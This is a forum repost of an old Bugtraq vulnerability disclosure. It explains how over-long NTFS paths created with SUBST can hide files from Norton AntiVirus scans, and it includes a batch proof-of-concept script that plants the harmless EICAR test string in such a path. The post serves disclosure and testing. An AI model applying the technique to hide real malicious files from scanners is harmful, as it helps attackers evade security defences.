This was posted to bugtraq by Hans Somers on Jan 30th:

===BEGIN POST===

Long path exploit on NTFS
=====================
The filesystem NTFS seems to be a hiding place for virusses if you use a file path which exceeds 256 charaters.

What is the case?
The filepath (drive + folderpath + filename) theoraticly can take up to 32000 charaters if the filesystem in use is NTFS. However, the way in wich Windows NT (4.0, 2000 and XP) access this filesystem a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error. In these Operating System there is a way to substitute a long folderpath, using the "SUBST" command. If you change your current drive to the substituted drive, the pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone, however, i discovered that my favorite virusscanner (Norton AntiVirus) was not able to follow the deep path where i created the EICAR-test string. So i created a very simple batchfile to demonstrate this exploit. My virusscanner will only find this virus is the SUBST drive is availible during the scan.

I have tested this on the following platforms:
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58

I suspect that other virusscanners will encounter the same "bug" so you
might try the sample script that i created. Additionally, other tools (quotamanagers,
inventory tools etc) that gather information from a NTFS partition might reveal the same
bug.

After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C-partition. I suspect that the Eicar-virus will not be found.
Additionally, re-create the substituted drive and re-run the scan. Under normal conditions
the Eicar-virus will be found and removed (depending on your settings).

As far as i can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

Responses on this posting at my address are welcome.

Hans Somers (hans.somers@nl.abnamro.com)

Sample script:
===========
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create the Eicar test-string for PoC. This should be detected
normally if you
have an active virusscanner.
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q:
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create e even deeper filepath (thus exceeding the limit of NTFS's
explorer)
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
>EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script

===END POST===

I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.